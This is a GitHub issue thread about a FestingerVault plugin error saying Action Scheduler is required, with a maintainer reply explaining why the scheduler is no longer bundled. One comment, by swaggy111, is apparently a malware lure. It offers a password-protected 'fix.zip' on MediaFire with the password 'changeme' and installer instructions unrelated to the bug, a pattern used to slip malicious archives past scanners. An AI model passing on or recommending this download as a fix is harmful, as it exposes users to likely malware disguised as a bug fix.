### ISSUE TITLE
[Bug]: Plugin says Action Scheduler is Required

### ISSUE THREAD

**Issue by ricardoaraujo330** [FestingerVault/festingervault#88]
### What happened?

Hi,

Since latest verison 5.0.0-beta.2.4.3.4 the plugin is saying that action scheduler is required. I have it working via cron, so I don't understand why i'm seeing this error.
<img width="1427" alt="Captura de ecrã 2024-08-26, às 09 54 59" src="https://github.com/user-attachments/assets/8280df13-a57f-4584-9049-1ac29507b011">

### Steps To Reproduce

Don't know.

### FestingerVault Plugin Version

5.0.0-beta.2.4.3.4

### PHP Version

7.4

### What browsers are you seeing the problem on?

Chrome

### Finally!

- [X] I have looked at other issues and I am sure this bug isn't on open status.

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ssovit** [comment]
Yes, action scheduler was bundled with the plugin before, but some plugins were having issues with it. 

FestingerVault plugin uses action scheduler to queue tasks that runs in background like plugin auto update, bulk actions.

Learn more about Action Scheduler at https://actionscheduler.org/
